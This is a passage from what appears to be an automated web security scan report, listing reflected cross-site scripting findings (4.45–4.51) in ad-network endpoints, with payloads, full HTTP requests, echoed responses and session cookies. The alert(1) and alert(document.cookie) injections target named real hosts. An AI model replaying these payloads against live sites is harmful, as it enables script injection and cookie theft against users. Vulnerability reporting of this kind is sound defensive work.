xy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$0V+!!!!#='htq"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:04 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 328
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match963e2';alert(1)//b76a6b65442?admeld_adprovider_id=420&external_user_id=3%3b0%3btPp_PCqix5Obrh3yjlbLU3gyTyCUWbWt4M5BfDPkgGVUdf8QWVFYFStNAfc-&expiration=1309173724" />
...[SNIP]...

4.45. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e962d'%3balert(1)//6b165d444b3 was submitted in the admeld_adprovider_id parameter. This input was echoed as e962d';alert(1)//6b165d444b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78e962d'%3balert(1)//6b165d444b3&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:06 GMT
X-Name: rtb-o07
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 199

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78e962d';alert(1)//6b165d444b3&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173666" alt="" />');

4.46. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e201a'%3balert(1)//d0668213c16 was submitted in the admeld_callback parameter. This input was echoed as e201a';alert(1)//d0668213c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche201a'%3balert(1)//d0668213c16 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:08 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 199

document.write('<img src="http://tag.admeld.com/matche201a';alert(1)//d0668213c16?admeld_adprovider_id=78&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173668" alt="" />');

4.47. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30caf'-alert(1)-'347d3038231 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=19330caf'-alert(1)-'347d3038231&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:03:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:03:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:03:46 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=19330caf'-alert(1)-'347d3038231&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

4.48. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cb4b'-alert(1)-'b719ccbe853 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9cb4b'-alert(1)-'b719ccbe853 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:03:50 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match9cb4b'-alert(1)-'b719ccbe853?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

4.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c8'%3balert(1)//f56d3235b6d was submitted in the admeld_adprovider_id parameter. This input was echoed as d86c8';alert(1)//f56d3235b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73d86c8'%3balert(1)//f56d3235b6d&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:16 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73d86c8';alert(1)//f56d3235b6d&external_user_id=3460050161923843111"/>');

4.50. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bff1e'%3balert(1)//7b738c3dd7a was submitted in the admeld_callback parameter. This input was echoed as bff1e';alert(1)//7b738c3dd7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbff1e'%3balert(1)//7b738c3dd7a HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchbff1e';alert(1)//7b738c3dd7a?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

4.51. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69369'-alert(1)-'a8318c35dc5 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x9069369'-alert(1)-'a8318c35dc5&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; 